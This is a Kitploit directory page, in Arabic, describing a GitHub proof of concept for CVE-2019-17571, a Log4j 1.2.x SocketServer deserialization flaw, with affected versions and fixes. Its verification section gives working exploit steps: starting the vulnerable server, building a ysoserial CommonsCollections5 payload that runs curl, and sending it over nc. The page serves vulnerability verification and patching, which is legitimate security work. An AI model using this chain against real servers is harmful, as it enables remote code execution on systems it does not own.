Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-17571 — يحتوي Apache Log4j 1.2.X على ثغرة تنفيذ التعليمات البرمجية عن بُعد عبر إلغاء التسلسل | Kitploit
أدوات/GitHubGitHub/shadow-horse/cve-2019-17571
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاختبار الاختراقأداة الوصول عن بعد
GitHubshadow-horse/cve-2019-17571

CVE-2019-17571

يحتوي Apache Log4j 1.2.X على ثغرة تنفيذ التعليمات البرمجية عن بُعد عبر إلغاء التسلسل

عرض المستودع
7852منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-17571/Apache Log4j 1.2.X تحتوي على ثغرة تنفيذ تعليمات برمجية عن بُعد عبر إلغاء التسلسل

الرابط المرجعي للتنبيه بالثغرة: https://mp.weixin.qq.com/s/okU2y0izfnKXXtXG3EfLkQ

1. وصف الثغرة

Apache Log4j هي أداة تسجيل مفتوحة المصدر مبنية على Java تابعة لمؤسسة أباتشي (Apache) البرمجية الأمريكية. توجد ثغرة تنفيذ تعليمات برمجية عن بُعد عبر إلغاء التسلسل في سلسلة إصدارات Apache Log4j 1.2.X. يمكن للمهاجم استغلال هذه الثغرة لتنفيذ أي أوامر ضارة. تحتوي إصدارات Log4j 1.2.X على فئة SocketServer، وهذه الفئة تُخضع البيانات غير الموثوقة بسهولة لعملية إلغاء التسلسل؛ فعند الاستماع إلى حركة مرور شبكة غير موثوقة خاصّة ببيانات السجلات، وعند دمجها مع أدوات إلغاء التسلسل (gadgets)، يمكن استغلال هذه الفئة لتنفيذ أي كود عن بُعد. ويشمل التأثير أحدث إصدار حاليًا.

2. خطورة الثغرة

عالية الخطورة

نطاق التأثير 1.2.4 <= Apache Log4j <= 1.2.17(أحدث إصدار)

توصيات الإصلاح

  1. الترقية إلى أحدث إصدار من سلسلة Apache Log4j 2

  2. منع تعريض منفذ socket الذي تفتحه هذه الفئة إلى الإنترنت

3. التحقق من الثغرة

منذ عصر Apache Log4j 2.8.1 كانت هناك ثغرة تنفيذ تعليمات برمجية عن بُعد عبر إلغاء التسلسل (CVE-2017-5645)، وكانت الفئة المسبِّبة للثغرة آنذاك هي org.apache.logging.log4j.core.net.server.TcpSocketServer، ومع الانتقال إلى عصر Apache Log4j 1.2.X أصبحت الفئة المسبِّبة للثغرة هي org.apache.log4j.net.SocketServer

1. تشغيل بيئة الثغرة

من خلال البحث عبر الإنترنت، تبيّن أن طريقة تشغيل socketserver لإصدارات log4j 1.X تتم عبر أمر java وليس عبر كود Java مباشرة. (إذا كانت هناك طرق تشغيل أخرى، نرحّب بإخبارنا بها)

بالمثل، تحتاج إلى تنزيل حزم jar المتأثرة وحزم jar القادرة على تنفيذ الأكواد، ووضعها في متغيرات البيئة (فيما يلي بيئة Windows)، ثم تشغيل الخدمة مع تمرير 3 وسائط: رقم المنفذ، وملف إعدادات log4j، ومجلد lcf:

root@kitploit:~
java -cp log4j-1.2.17.jar;c3p0-0.9.5.2.jar;mchange-commons-java-0.2.11.jar;commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 log4jserver.properties ./    

java -cp log4j-1.2.17.jar:../commons-collections/commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 config/log4jserver.properties ./

2. استخدام POC لثغرة RCE في log4j2

root@kitploit:~
	java -jar ysoserial-master.jar CommonsCollections5 "curl http://127.0.0.1/ssrf/ssrf.php?rand=log4j" > log4j.curl.bin  

3. إرسال socket خبيث باستخدام nc

root@kitploit:~
nc 127.0.0.1 4560 < log4j.curl.bin

الحصول على حزم jar ذات الصلة: https://github.com/shadow-horse/Vulenvironment/libs

تنزيل الأداة